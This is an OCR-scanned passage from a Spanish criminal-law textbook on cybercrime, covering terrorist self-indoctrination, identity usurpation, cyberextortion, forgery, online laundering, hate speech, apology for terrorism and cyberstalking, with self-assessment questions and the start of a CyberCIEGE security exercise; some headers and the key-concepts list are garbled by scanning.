personas que compartan su credo y que posean aptitud para sostener en el
tiempo, de una manera eficaz, la acción criminal que les caracteriza. Como
todo delito de terrorismo, pretende tutelar el orden constitucional que esta
clase de organizaciones criminales pretende subvertir, o en otras expresio-
nes, la "paz pública" entendida como el orden democrático, los mecanismos
democráticos de la toma de decisiones y el monopolio del Estado en el uso de
la violencia.

- 273 -
Cibercriminalidad.
Tercera parte. LOS CIBERCR.ÍMENES EN PARTICULAR

El castigo del autoadoctrinamiento y autoadiestrameinto no es más que


el castigo de actos pre-preparatorios -también denominados protoprepara-
torios- con el que se reconoce por primera vez en nuestro Código penal lapo-
sibilidad de sancionar actos preparatorios con una naturaleza estrictamente
individual (CADENA SERRANO, 2 O19).
Por esta excesiva anticipación el precepto ha sido muy criticado. Se trata
de un delito completamente novedoso a nivel de Derecho comparado, que no
encuentra parangón en la normativa internacional. La falta de cobertura en los
instrumentos internacionales y la amplitud de esta clase de conducta ha dado
lugar a un intenso debate acerca de la posible vulneración de derechos fund a-
mentales, tales como la libertad ideológica y de expresión, así como el derecho
a la información. En su normativa, el Consejo de Europa lo rechaza incluso de
manera explícita (SSTS 354/2017, de 17 mayo; 734/2017, de 15 de noviembre;
140/2019,de 13 marzo; 306/2019, de lljunio).

La conducta típica viene delimitada por un elemento subjetivo cuya au-


sencia hace la acción penalmente insignificante: la finalidad de capacitarse
para llevar a cabo cualquiera de los delitos de terrorismo. El elemento subje-
tivo del injusto, expresamente requerido, es diverso y contiene un elemento
teleológico o finalista redoblado; de forma que el acceso habitual a Internet o
la adquisición o tenencia documental debe ser con la finalidad de capacitarse,
donde el logro pretendido de tal aptitud, a su vez, ha de ser para llevar a cabo
cualquiera de los delitos de terrorismo (STS 661/2017, de 10 de octubre).
Esa doble finalidad debe concurrir en los accesos a servicios de comunica- -
ción como resulta de la exigencia de que los contenidos de éstos estén diri-
gidos o resulten idóneos para incitar a la incorporación a una organización o
grupo terrorista, o a colaborar con cualquiera de ellos o en sus fines. Además,
el contenido de las páginas electrónicas a las que se accede o de los documen-
tos que se adquieren o se poseen, deben estar dirigidos o resultar idóneos
para incitar a la incorporación a una organización o grupo terrorista, o a cola-
borar con cualquiera de ellos o en sus fines. Se trata de una exigencia objetiva
predicable del contenido al que se accede, se adquiere o se posee. Ello signi-
fica que no debe ser confundido con la finalidad del sujeto, que debe además
concurrir, al margen de que el conocimiento de esa cualidad del contenido
deba ser abarcada por el dolo.
Ej. 6.26.: A pesar de los problemas que entraña este delito, son múltiples
las sentencias que Jo han aplicado ya. Por ejemplo , las SSAN de 30.11.2016,
07.12.2016, y de 28.02.2017. En las dos primeras los sujetos condenados de-
sarrollaron una importante actividad proselitista a través de las redes sociales
(concretamente a través de Facebook), compartiendo mensajes de claro conte-

- 274 -
Capítulo 6. CIBERC!ÚMENES EN NTI OAMPLIO

nido radical. En ambos casos, además, se intervinieron a los condenados telé-


fonos móviles con documentación de carácter ylhadista. El contenido radical
yihadista tanto de los mensajes propagados como de los documentos interve-
nidos resulta inequívoco. En ellas se describe el camino psicológico que típica-
mente transitan las personas que son convencidas (o autoconvencidas) por el
yihadismo radical. Éstas fases serían, según los propios términos de la prueba,
la del "victimismo" (en la que se identifica a un colectivo musulmán más o me-
nos amplio como víctima), "culpabilización" (en la que se identifica al responsa-
ble: Occidente), (<solución» (en la que el sujeto se pregunta sobre cuál debe ser
su papel) y, finalmente, "activismo" (en la que el sujeto pasa a defender activa-
mente la violencia) (PUENTE RooRíGUEZ, 2017) .
También las SSTS 140/ 2019, de 13 de marzo de 2019 y 150/2019, de 21
de marzo de 2019 : la causa referente a la STS. 140/2019, se había declarado
probado que el autor había asumido la finalidad de establecer estructuras de
captación y reclutamiento de nuevos adeptos para el Estado lslárrúco; que se
había integrado en la captación de adeptos. Utilizaban la red social Facebook.
Si los primeros contactos eran satisfactorios en cuanto afinidad id eológica, se
pasaba a una segunda red social, a través de WhatsApp. Luego se agregaban a
un grupo del que los autores eran los creadores y administradores. El siguiente
paso del proceso se materializaba en conversaciones en privado. Por lo menos
tres jóvenes marroquíes se vieron inmersas en ese proceso de captación y adoc-
trinamiento que tenía como finalidad última la incorporación a las filas del Es-
tado Islámico. La red se había desvelado como un sistema del todo eficaz.
En la causa referente a la STS 150 / 2019 la acusada facilitaba entradas des-
de Turquía a Siria y se erigía como f1gura relevante en la red, utilizando diversos
perfiles en Facebook. En el registro realizado en su domicilio se intervinieron
dispositivos electrónicos y otros efectos, destacando tarjetas de memoria con -
teniendo videos de carácter yihadista.
Sin embargo, en la STS 13/2018, de 16 de enero un joven yihadista hace
público en las redes sociales su apoyo al DAESH, presentando al Estado Islámico
como "heroico", haciendo llamamientos a llevar cabo la yihad. Se entendió que
esta conducta era absorbida en el delito ele colaboración con banda terrorista.

6. Otros supuestos delictivos

a) Usurpación del estado civil: la impropiamente denominada suplan-


tación de identidad, en realidad usurpación del estado civil, se encuentra re-
gulada en el art. 401 CP. Desde un sector doctrinal, se ha solicitado el encaje
en este precepto de las conductas de creación de perfiles falsos en las redes
sociales o páginas web de Internet (LLOruA GARcíA, 2013; ÉcIJA BERNAL, 2017 3 ).
Usurpar es arrogarse en la posición de otro, apoderarse de su personalidad y

- 275 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRíMENES EN PARTICULAR

hacer uso de sus derechos (suplantar su filiación, su paternidad, sus derechos


conyugales, etc.; STS, de 15 de junio de 2009; SAP Barcelona, 385/2016, de 28
marzo). Por estado civil se entiende el conjunto de cualidades, atributos y cir-
cunstancias de la persona, que la identifican jurídicamente y que determinan
su capacidad con cierto carácter de generalidad y permanencia. En realidad,
lo que se protege con la usurpación del estado civil es la seguridad del tráfico
jurídico fe pública, por lo que debe hacerse uso de la identidad suplantada en
aspectos que tengan relevancia en el tráfico jurídico, aunque no se plasmen
en ningún documento electrónico.
A quien se usurpe el estado civil debe ser una persona real, no puede
tratarse de una persona imaginaria ni virtual. Sin embargo, cuando la con-
ducta se limita a utilizar en la red un nombre que no corresponde al real, sino
que es ficticio, y no se utilizan el nombre u otros datos personales ajenos, la
conducta no será merecedora de reproche penal, ya que exclusivamente se
incumplen las normas de buen uso de la red. Utilizar el nombre y la fotografía
de otra persona en Internet, aunque la actividad tenga cierta permanencia en
el tiempo, tampoco supone usurpar su estado civil si no se hace uso de los
derechos de esa persona.
Frente a esta despenalización de la usurpación del estado civil sin uso de los
derechos, considerando que toda red social, web o archivo informático es, en reali-
dad, un documento electrónico, se ha propuesto también la posibilidad de acudir
a los delitos de falsedad del art. 390.1.1.º CP, que castiga la alteración de un docu-
mento en alguno de sus elementos o requisitos de carácter esencial (identidad) en
perjuicio de tercero -no solamente económicos, sino también de carácter moral-y
la consistente en suponer en un acto la intervención de personas que no la han te-
nido. Por su parte, el art. 395 castiga al que, para perjudicar a otro, cometiere en
documento privado alguna de las falsedades previstas en los tres primeros núme-
ros del apartado 1 del art. 390 CP (RODRÍGUEZ FERNANDEZ, 2012). Esta solución ha sido
adoptada en un caso de creación de un perfil de otra persona en la red social, para
cuya investigación se han reabierto unas diligencias por un delito de falsedad en
documento privado, entendiendo corno tal el archivo electrónico online del perfil
creado con la identidad de esa otra persona ajena a quien materialmente creó el
perfil (AAP Madrid 461/2017, de 25 de mayo; MAGRO SERVET, 2017).

Una conducta cercana a la usurpación de identidad a través de Internet


es el denominado spoo.fin9, que hace referencia al uso de técnicas a través de
las cuales un cibercriminal se hace pasar por una entidad distinta, a través de
la falsificación de los datos en una comunicación (Éc1JA BERNAL, 2017 ).

b) Extorsión, amenazas, calumnias, injurias: como reflejo del delito pa-


trimonial mediante coacción en el mundo físico (art. 243 CP), la ciberextorsión
consiste en el uso de violencia o intimidación, aplicada a través de los medios

- 276 -
Capítulo 6. CIBERCIÚMENES N NTIDO AMPLIO

informáticos o telemáticos, de manera que se consiga que la víctima realice un


acto o negocio jurídico en perjuicio propio o ajeno, tramitado a través de la web
(Éc1JA BERNAL, 2017 3 ). Dado que el cibercriminal y la víctima seguramente no
tendrán contacto más allá del ámbito digital, la ciberextorsión se realizará me-
diante violencia psicológica. Es habitual el uso de ransomware o programas de
bloqueo de dispositivos (CHor, Sean, LECLAIR, 2016), para solicitar dinero a cam-
bio de una hipotética "liberación" de los archivos, programas o documentos de
la víctima. Estas infecciones se propagan en correos electrónicos que suplantan
a usuarios legítimos (phishing ), o incluso alterando sitos web legítimos (deface -
ment) que contagian a los internautas que los visitan (BARRIO ANDRÉS, 2018). Por
otra parte, las ciberamenazas se entienden como el uso de la red, los smartpho-
nes, u otras TIC para intimidar a otro con el anuncio de la provocación de un
mal futuro para la víctima o personas de su entorno (ÉCIJA BERNAL, 2017). Su
castigo penal procederá conforme a los arts. 169 y ss. CP dependiendo de que
se trate de amenazas de delito, condicionales o no condicionales, dirigidas a
atemorizar a los habitantes de una población, etc.
Ej. 6.27.: Según el Anuario Estadístico del Ministerio del Interior de Es-
paña, se han producido 9.839 amenazas por internet en 2011, 9.207 en 2012,
9.064 en 2013 y 9.559 en 2014. Advierte que las amenazas constituyen un 20%
ele los delitos que se producen en Internet.

Desde hace algunos años se ha detectado en España un aumento signifi-


cativo de hechos delictivos a través de RRSS en cuyo contexto se diluye o re-
lativiza la conciencia sobre la antijuridicidad de las amenazas, injurias, coac-
ciones, etc. Entre los atentados contra el honor y la dignidad de las personas,
se encuentran conductas muy heterogéneas, como la grabación de palizas y
otros hechos delictivos y posterior difusión de las imágenes (happyslaping)
(LLORJA GARC1A, 2013).

c) Falsedades documentales: los cibercriminales que crean o modifican


documentos informáticos o electrónicos, están simulando a la vez en todo
o en parte un documento mercantil, público, oficial o privado, y pueden co-
meter un delito de falsedad documental tipificado en los arts. 390 y ss. CP.
Como ya se dijo en el apartado relativo a la prueba electrónica, actualmente
se acepta el documento electrónico como plenamente válido en el tráfico ju-
rídico (HERRERA MORENO, 2001; VELASco NÚÑEZ, 2011) y, conforme al art. 26 CP, a
efectos penales se considera documento.
El art. 3 de la Ley 59 /2003, de 19 de diciembre, de firma electrónica, de-
fine la firma electrónica como el conjunto de datos en forma electrónica, con-

- 277 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

signados junto a otros asociados con ellos, que pueden ser utilizados como
medio de identificación del firmante. Por tanto, un documento electrónico
puede ser falsificado mediante artificios informáticos suplantando la firma
electrónica de un usuario. Asimismo, el legislador admite que las tarjetas de
crédito, cuya falsificación requiere una manipulación informática de las ban-
das magnéticas, son documentos a efectos penales (art. 399 bis CP) (REY Hm-
D0BRo, 2012; VELASCO NÚÑEZ, 2011) .
Finalmente, se regula en el art. 399 CP el tráfico y uso de certificados
falsos, aunque no se haya intervenido en su confección, sean del país que sean
y se hayan realizado o adquirido donde sea, siempre que sean usados en Es-
paña. La proliferación de páginas web extranjeras que son usadas para con-
seguir certificados falsos en Internet que luego se usan en España, pueden
encajar con esta conducta (VELASco NÜÑEz, 2011).

d) Blanqueo de capitales online: el ciberblanqueo se produce mediante


el ofrecimiento a las víctimas y colaboradores por terceras personas, de nego-
cios, operaciones, ofertas, engaños y estafas, para que operen con diferentes
activos, y conseguir introducirlos en el sistema financiero. Ya hemos hablado
con anterioridad de la figura del mulero o cibermula, esto es, el intermediario a
través del cual se conseguía realizar el envío de dinero resultado de una estafa
informática. El mulero podrá ser imputado por un delito de blanqueo de capi-
tales doloso (art. 301.1 CP) si se encontraba en plena connivencia con el esta-
fador informático que consiguió los datos bancarios (también responderá, en
este caso, como cooperador necesario de la estafa informática); a título doloso
eventual cuando pueda probarse una ignorancia deliberada de que el dinero
extraído y transmitido tiene su origen en un delito, contando el sujeto con la
probabilidad de que así sea, a pesar de lo cual, contribuye a distribuirlo en el
mercado lícito, no siendo necesario que conozcan la identidad de los estafado-
res informáticos; o, finalmente en su modalidad imprudente grave (art. 301.3
CP), cuando infringiendo un deber de cuidado, realiza la conducta de blanqueo,
por lo general, pero no necesariamente, sospechando que el dinero ingresado
en su cuenta procede de una actividad delictiva, pero confiando en que no sea
así (imprudencia consciente) (VELASCO NÜÑEZ, 2008; REY HmDOBRO, 2012).

e) Delitos de incitación al odio y la discriminación: a través de los mo-


dernos medios de comunicación telemática se vierten, de manera más o me-
nos prudente, las opiniones de los usuarios. Algunos de los mensajes que
pueden incluirse en las redes sociales y páginas web pueden incitar al odio, la

- 278 -
Capítulo 6. CIBERCIÚMENES EN SENTIDO AMPLIO

violencia o la discriminación (BERNAL DEL CASTILLO, 2014). Esta clase de mensa-


jes han sido conceptualizados impropiamente como "discursos del odio". En
estos supuestos nos encontramos ante la posible comisión, a través de me-
dios tecnológicos, de los denominados delitos de odio. En estos supuestos, el
conflicto con el derecho a la libertad de expresión es especialmente intenso
(LANDA GoROSTIZA, 1999; PORTILLA CoNTRERAS, 2015; CAMARA ARROYO, 2018).

En el campo de los hatecrimes cometidos a través de las nuevas TIC,


nuestro legislador penal y la jurisprudencia han seguido una senda cada vez
más incriminadora (LANDA GoROSTIZA, 2012). En los últimos años hemos sido
testigos de polémicas condenas por delitos de enaltecimiento del terrorismo
y humillación a las víctimas cometidas a través de las redes sociales en la for-
ma de chistes de humor negro.
En concreto, el art. 510.3 CP dispone que los castigos por la comisión de
delitos de odio se agravarán en su mitad superior cuando los hechos se hu-
bieran llevado a cabo a través de un medio de comunicación social, por medio
de Internet o mediante el uso de tecnologías de la información, de modo que,
aquel se hiciera accesible a un elevado número de personas. De hecho, la uti-
lización de las nuevas tecnologías, supone que el autor incorpora su mensaje
a las redes telemáticas con vocación de perpetuidad, pero a su vez carece de
control sobre su difusión, pues desde que ese mensaje llega a manos de su
destinatario este puede multiplicar su impacto mediante sucesivos y renova-
dos actos de transmisión, ligado al inevitable recorrido transnacional de es-
tos mensajes. Junto a lo anterior y precisamente por ello, debe destacarse la
mayor dificultad de estos supuestos para la investigación del delito y la iden-
tificación de los autores, cuando se realice a través de un seudónimo, nick o
"avatar" (STS 4/2017, de 18 de enero; Rorn TORRES, 2015; GAscóN CUENCA, 2015).
Ej. 6.28.: La red social Twitter y la modalidad del retuiteo puede ser espe-
cialmente descriptiva de estas conductas. La SIS 72/2018, ele 9 de febrero, afir-
mó que las expresiones vertidas "a través de la red social cuyos contenidos se
encuentran en Internet" justifica la aplicación del art. 510.3 CP, ya que la "fun-
damentación de la agravación radica en la proyección, buscada por el autor. del
mensaje que se emite".

En opinión de LAMARCA PÉREZ (2017), la medida "más polémica y contraria


a la libertad de expresión" resulta de la previsión del art. 510.6 CP que permite
a la autoridad judicial autorizar la destrucción o el borrado de libros, archivos,
documentos u otros soportes a través de los cuales se hubiera cometido el deli-
to o el bloqueo o interrupción del servicio de portales de acceso a Internet.

- 279 -
Cibercriminalidad.
Tercera parte. LOS CIBERCIÚMENES EN PARTICULAR

d) Provocación, apología (al genocidio, terrorismo): en Internet, las RRSS


y las nuevas TIC la apología o ciberapología supone el discurso o declaración
en favor de acciones delictivas o violentas, alabándolas y defendiéndolas, legiti-
mándolas de forma que se llega a justificar su uso en determinadas situaciones
y promoviendo las acciones relacionadas con este fenómeno, pero expresada a
través de la red, que se convierte en el principal canal de comunicación para los
sujetos que la realizan, debido a su mayor difusión (ÉcIJA BERNAL, 2017 1 ).
En el art. 18 CP se encuentra el concepto de apología, como modo de
provocación para delinquir, definido como la exposición, ante una concu-
rrencia de personas o por cualquier medio de difusión, de ideas o doctrinas
que ensalcen el crimen o enaltezcan a su autor. La apología solo será delictiva
como forma de provocación y si por su naturaleza y circunstancias constituye
una incitación directa a cometer un delito. Esta modalidad genérica engloba
la posibilidad de incitación directa a la comisión de hechos delictivos a través
de las TIC, así como el enaltecimiento dirigido a la misma finalidad. La apolo-
gía como forma de provocación solamente se castigará cuando expresamente
se prevea en un artículo del Código penal.
No obstante, en nuestro ordenamiento penal existen otros delitos que
regulan otras formas específicas de enaltecimiento o apología: El delito de
enaltecimiento del terrorismo y humillación a las víctimas se encuentra regu-
lado en el art. 578.1 CP, mientras que en el art. 578.2 CP se establece una regla
penológica que transforma el delito en agravado cuando tales conductas se
cometen mediante la difusión de servicios o contenidos accesibles al público
a través de medios de comunicación, Internet, o por medio de servicios de
comunicaciones electrónicas o mediante el uso de tecnologías de la informa-
ción. Ambos supuestos han sido encuadrados dentro del denominado "dis-
curso del odio", anteriormente analizado (BERNAL DEL CASTILLO, 2016; CANO PA-
ÑOS, 2016; CAMARA ARROYO, 2018).
El precepto ha tenido un recorrido legislativo de progresivo endurecimiento,
siendo introducido por la reforma del CP de 1995 llevada a cabo por la LO 7 /2000,
que insertó una revisión del concepto de apología (art. 18 CP) creando un delito es-
pecífico para los delitos de terrorismo, denominado "enaltecimiento", que también
ha sido modificado por la LO 2/2015 (BERNAL DEL CASTILLO, 2016).

La realización de actos que entrañen descrédito, menosprecio o humi-


llación de las víctimas no constituye un supuesto de apología específico, sino
de un comportamiento que está mucho más cercano a los delitos de injurias
(descrédito) o de manera mucho más exacta a los delitos contra la integridad
moral a tenor de los verbos típicos utilizados en la redacción del precepto
(menosprecio o humillación) (STS 846/2015 de 30 diciembre; CAMARA ARROYO,

- 280 -
Capitulo 6. CIBERCR.ÍMENES EN SENTIDO AMPLIO

2018) . La conducta típica consistiría en la emisión de mensajes que se dirijan


a la difamación, disminución o pérdida de la reputación, valor, estima o digni-
dad de las víctimas del terrorismo.
Ej. 6.29.: El conflicto con la libertad de expresión queda patente en las re-
cientes condenas y absoluciones a "tui teros", de géneros tan dispares como ar-
tistas (Caso Titiriteros) (GuTJÉRREZ }lMÉNEZ, 2018), músicos contestatarios (Casos
Straberry, Pablo Hase], Valtonyc) donde prácticamente el mensaje contestatario
y la crítica mordaz es un pre rrequisito e, incluso, políticos (Caso Hasier Arraiz,
Zapata), o estudiantes universitarios (Caso Cassandra).

Finalmente, ante la estupefacción de la mayor parte de la doctrina, el art.


510.1.c CP "resucita" las conductas de negación del genocidio del antiguo art.
607.2 CP, declarado inconstitucional por la STC 235/2007, de 7 de noviem-
bre (SUÁREZ ESPINO, 2008; RAMos VAZQUEZ, 2009; LASCURA1N SANCHEZ, 2010), si bien
remozado para adaptarse a la doctrina constitucional, incorporando la exi-
gencia de que tales conductas promuevan o favorezcan un clima de violencia,
hostilidad odio o discriminación contra determinados grupos de personas
(BERNAL DEL CASTILLO, 2016).
Además del delito de negacionismo, se incluyen como modalidades la
difusa conducta de "trivializar gravemente" y la de enaltecimiento del genoci-
dio o sus autores. Respecto al enaltecimiento del genocidio o sus autores, de
contenido muy similar al de la apología, si bien "se configura como una moda-
lidad de incitación indirecta al odio u hostilidad contra los grupos víctimas de
aquellos delitos, por lo que su tipificación independiente resulta en realidad
superflua, sin más valor que el meramente simbólico" (ALASTUEY DoBóN, 2016).
En definitiva, como advierten algunos autores, "se establece un adelanta-
miento desmesurado de las barreras de protección al vincularse la negación,
trivialización grave o enaltecimiento de los delitos de genocidio o, en gene-
ral, contra la Comunidad Internacional, a la promoción o el favorecimiento de
«un clima de violencia, hostilidad, odio o discriminación» y no a la incitación
de la «violencia o al odio contra tal grupo o un miembro del mismo". El matiz
diferenciador es relevante, ya que implica la tipificación de un "delito de cli-
ma", sin ningún criterio que lo compense y, además, no existe peligro para los
valores tutelados" (DE PABLO SERRANO & TAPIA BALLESTEROS, 2017).
Por "clima" debe entenderse "una atmósfera o estado de opinión pro-
picio para la reproducción de conductas violentas, hostiles, de odio o discri-
minatorias" contra determinados colectivos protegidos (AGUILAR GARCÍA ET AL,
2015; GARROCHO SALCEDO, 2015; GóMEZMARTÍN, 2016).

- 281 -
Ci bercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

e) Cyberstalking, acecho o acoso (art. 172 ter) y cyberbullying: el art.


172 ter CP castiga a quien acose a una persona, llevando a cabo de forma in-
sistente y reiterada, y sin estar legítimamente autorizado determinadas con-
ductas siguientes, y, de este modo, altere gravemente el desarrollo de su vida
cotidiana. Entre las citadas, destacamos las que pueden cometerse a través de
las TIC:
• Establezca o intente establecer contacto con ella a través de cual-
quier medio de comunicación, o por medio de terceras personas.
■ Mediante el uso indebido de sus datos personales, adquiera produc-
tos o mercancías, o contrate servicios, o haga que terceras personas
se pongan en contacto con ella.
Tal vez es la modalidad de stalking o acecho (también llamado acoso ge-
nérico) más conocida y frecuente, puesto que incluye aquellas conductas con-
sistentes en la reiteración de llamadas telefónicas, mails, mensajes de texto,
etc. (VILLACAMPA EsTIARTE, 2009, 2013 y 2015; CAMARA ARROYO, 2016).
El ciberacoso supone acosar u hostigar el espacio digital o virtual de la
víctima y, a través del mismo, al propio sujeto. Su característica definitoria y
diferenciadora es que el medio para agredir es de naturaleza tecnológica. Los
medios a través de los cuales se produce el ciberacoso son muy diversos, aun-
que en los últimos años su vehículo más frecuente son las Redes Sociales, los
dispositivos móviles y los espacios chaty mensajería virtual (email, Messenger,
etc.) de Internet. Aunque se trata de un acoso realizado desde la distancia y fa-
vorecido por la impunidad que suelen proporcionar los medios tecnológicos, es
habitual que víctima y agresor hayan mantenido un contacto físico previo. De
hecho, una de las principales problemáticas de este fenómeno es la fácil trans-
misión de la agresión de un ámbito a otro, pudiendo comenzar en cualquiera de
los dos espacios -físico o virtual- y cambiar rápidamente al otro.
Se diferencia entre el ciberhostigamiento y el ciberacecho (cyberstal-
king), en los siguientes términos: el hostigamiento cibernético es la intimi-
dación, que se repite o no, de un individuo o un grupo de individuos hacia
otra persona perpetrado a través o utilizando medios electrónicos. El acoso
cibernético es un curso de acción que involucra más de un incidente perpe-
trado a través o utilizando de medios electrónicos, que causa angustia, miedo
o alarma (MAPLE, C., SHORT, E. & BRowN, A. ETAL, 2011) .
Cualquiera puede ser acechador, así como cualquiera puede ser víctima
de un acechador. No hay un único perfil psicológico o de comportamiento en
el que encaje todo acechador (ALONSO DE EscAMILLA, 2013). La mayor parte de

- 282 -
Capitulo 6. CIBERClÚMENES EN SENTIDO AMPLIO

los acosadores (entre un 70-85%) son de sexo masculino si bien ello no signi-
fica necesariamente que se trate de un delito de género (MA.cKENZIE, McEwAN,
PATHÉ, ÜGLOFF, &MuuEN, 2009), puesto que también se ha investigado el perfil
de la mujer acosadora.
Es frecuente encontrar fracasos sentimentales o relaciones fallidas
como característica común entre los acosadores (MELOY, 1999). Es bastante
habitual que la situación de acoso se produzca inmediatamente después de
una ruptura sentimental, separación o divorcio, así como que sea realizada
por personas con dificultades para entablar relaciones afectivas sanas y es-
tables o con intolerancia al rechazo (GARRIDO GENOVÉS, 2001). Algunos estudios
también apuntan a que algunos supuestos de acoso de hombres hacia muje-
res se producen en la búsqueda de entablar una relación sentimental o como
venganza tras un desaire amoroso. Tal vez por estos motivos la mayor parte
de los estudios realizados muestran que es bastante usual que víctima y vic-
timario se conozcan con anterioridad a la producción del hecho delictivo. So-
lamente en porcentajes relativamente pequeños el stalker es un extraño. Las
personas que cometen conductas de acoso tienen habitualmente múltiples
problemas en la esfera penal, psiquiátrica/psicológica y de abuso de drogas
(CAMARA ARROYO, 2016) .
La edad de los acosadores tiende a ser mayor que la de otros delincuen-
tes, encontrándose entre los 35 y 40 años de media (MELOY, 2007; MULLEN,
PATHÉ, PURCELL, & STUART, 2000; ScHWARTZ-WATTS, 2006). No obstante, algunos
estudios han demostrado que los menores se involucran también en el ace-
cho, y sus actividades son completamente compatibles con las de los aco-
sadores adultos (McCANN, 1998, 2000, 2001 y 2002) . Ciertamente, los más
jóvenes prefieren las modalidades de acoso a través de las TIC, sobre todo
mediante el hostigamiento a través de las novedosas RRSS (cyber-stalking,
cyber-harassment o cyber-bullying).
Precisamente, en los últimos años ha tenido una gran relevancia el fenó -
meno conocido como Bullying o acoso escolar, fundamentalmente represen-
tado por la alarma que suscitó en nuestro país el Caso Jokin (SAP de Guipúz-
coa, de 15 de julio de 2005) en el que la víctima terminó suicidándose debido
al acoso que sufría por parte de otros menores de edad.
Con el término anglosajón bullying se hace referencia a un conjunto hete-
rogéneo de infracciones penales de distinta gravedad insertadas en la idiosin-
crasia de lo que algunos autores (RUBIALES BÉJAR, 2010) han denominado "mato-
nismo escolar". Las conductas derivadas del acoso escolar pueden incardinarse
en la afectación de diversos bienes jurídicos protegidos: integridad física y psí-
quica, el honor, la integridad moral del menor, etc. Engloba una gran variedad
de comportamientos violentos -agresiones físicas , verbales y psíquicas- que

- 283 -
Cibercriminal!dad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

se producen de modo escalonado, de forma reiterada y frecuente, aumentando


en gravedad e intensidad progresivamente. Concurre también en esta conducta
una nota de desequilibrio de poder, que puede manifestarse en forma de actua-
ción en grupo, mayor fortaleza física o edad, aprovechamiento de la discapaci-
dad de la víctima etc. Los denominados "espectadores" (otros alumnos) juegan
un papel fundamental en la permisividad de las conductas violentas en el ámbi-
to escolar. El acosador tiene la intención de dañar a la víctima, pero a la vez con
frecuencia se autojustifica, en especial en los casos de comisión en grupo, con
el subterfugio de que no se sobrepasa la mera diversión (Instrucción 10/2005,
de 6 de octubre, de la Fiscalía General del Estado sobre el tratamiento del acoso
escolar desde el sistema de jusl iciajuvenil).
El bullying o acoso escol · r puede definirse, en definitiva, como un com-
portamiento negativo (dañinoi intencional y repetido a manos de una o más
personas dirigido contra quien tiene dificultad para defenderse.
El bullying no es un delito a tónomo recogido como tal en el Código pe-
nal, sino que se suele adscribir t delitos o faltas de amenazas, coacciones,
lesiones, injurias, etc. dependie do de su gravedad (SANCHEZ GARCÍA DE PAZ,
2007).
El cyberbullying es el delito más frecuentemente cometido, después de
la "piratería", por menores de edad. Podemos definir como ciber acoso o cy-
berbullying como un conjunto heterogéneo de comportamientos agresivos
realizados a través de aparatos tecnológicos o de las nuevas Tecnologías de
la Información y la Comunicación (PARDO ALBIACH, 2010). Puede entenderse
como el abuso de poder continuado de un menor sobre otro realizado por
medio del uso de las TIC, caracterizándose por conductas centradas en ator-
mentar, amenazar, humillar, hostigar o molestar al menor, pero estas ya no
tienen como ámbito la escuela ni ningún otro espacio físico, sino el ciberes-
pacio (MrRó LLINARES, 2013). Quedan excluidas, eso sí, aquellas agresiones de
carácter sexual, puesto que se corresponderán con otros hechos delictivos,
como el childgrooming o el sexting.
El vehículo fundamental para esta clase de hecho delictivo suelen ser
las llamadas redes sociales, medios de comunicación virtuales muy utiliza-
dos por los menores de edad como principal vehículo de socialización de las
sociedades actuales (DEL Río, J., SÁDABA, C. & BRINGUÉ, X., 2010), como las redes
sociales, los dispositivos móviles y los espacios de chat y mensajería virtual
(email, Messenger, etc.)
Cuando la gravedad de la conducta es suficiente, algunos comportamien-
tos englobados en el acaso escolar pueden ser tipificados como un delito con-
tra la integridad moral (arts. 173 CP y ss.) (ORTEGA BALANZA & RAMíREz RoMERO,
2015). El delito de amenazas que recoge esta clase de comportamientos con

- 284 -
Capitulo 6. CIBERCIÚMENJlS EN SENTIDO AMPLIO

más propiedad es el art. 171.1 CP, cuyo bien jurídico protegido es la integri-
dad moral de la persona, si bien también protege en conjunción otros bienes
jurídicos de vital importancia como la vida o la integridad física y psíquica.
El delito castiga los tratos especialmente degradantes de carácter grave que,
según la jurisprudencia, son "aquellos que pueden crear en las víctimas sen-
timientos de terror, de angustia y de inferioridad susceptibles de humillarles,
de envilecerles y de quebrantar en su caso su resistencia física o moral" (SSTS
1218/2004, de 2 de noviembre, 819/2002, de 8 de mayo y 1122/1998, de 29
de septiembre).

- 285 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

CONCEPTOS CLAVE

íld groof(ling, sexting, sex casting, sextq,rs'ión, actos de -acercamiento,'pe-


.\Tii:tu;aty{oomer, própted:ld•intelectú~l; piraterí:;i cH.gffal, do.q ünios web,
ámbio de aíxlí'ivos PZP, ~tre(lming,,realaser, cyberbul(ying, sr¡ooping,phar-·
ming, cyberstalking. '
,~ ' '?>
"

EJERCICIOS DE AUTOEVALUACIÓN
l. ¿Qué fases pueden delimitarse en el proceso de comisión de un delito de child
grooming? Explique sus puntos fundamentales.
2. ¿A qué se refiere el art. 183 ter CP por actos materiales de acercamiento? Razo-
ne su respuesta.
3. ¿Qué bienes jurídicos protege la regulación del delito de sexting?
4. ¿Qué dos normas estatales delimitan el ámbito civil de los delitos contra la pro-
piedad intelectual relativos a los arts. 2 70 y 2 70.2 respectivamente?
5. ¿Qué efectos penales provoca el uso de una red P2P por parte de un internauta
y por parte del responsable de la página web que enlaza o redirecciona al usua-
rio a contenidos protegidos?
6. Exponga dos modalidades diferentes de enlace de contenidos a través de una
página web.
7. ¿Qué conductas delictivas encajan con el concepto de cyberbullying?
8. Exponga tres modalidades diferentes de estafa común cometidas a través de
medios tecnológicos. Explique su modo de ejecución y en qué consiste cada una
de ellas.
9. ¿Qué tipo de conductas de acecho pueden realizarse a través de las TIC?
10. Si un sujeto suplanta la identidad de otra persona en la red (por ejemplo, crean-
do un perfil falso haciéndose pasar por ella) ¿Es posible condenarlo por un deli-
to de usurpación del estado civil? ¿Qué otras opciones de condena existen?

- 286 -
Cuarta parte:
Anexo.
Casos Prácticos
1
Prácticas de seguridad informática
PRÁCTICA N. l. EL IMPACTO DE LA SEGURIDAD

l. Objetivos

La ciberseguridad tiene siempre un impacto en nuestros procesos de ne-


gocio, y es fundamental encontrar un equilibrio entre su aplicación y la activi-
dad normal de nuestra organización.
En la siguiente actividad le proponemos que averigüe por si mismo cuál es
la relación entre el funcionamiento de una empresa y la aplicación de mecanis-
mos de seguridad. Para ello utilizaremos un juego educativo: CyberCIEGE.
Para profundizar en estos conceptos le animamos a que vea el siguiente
video (en inglés): https://www.youtube.com/watch?v=C9I8T4prj1Q

2. Desarrollo de la actividad

,CyberCIEGE
;11

Para comprobar el impacto económico de la seguridad de los sistemas


de información en una organización vamos a probar un escenario del juego
CyberCIEGE. l /
' :

Está disponible princip\ ,ente para p~ataforrnas Windows.

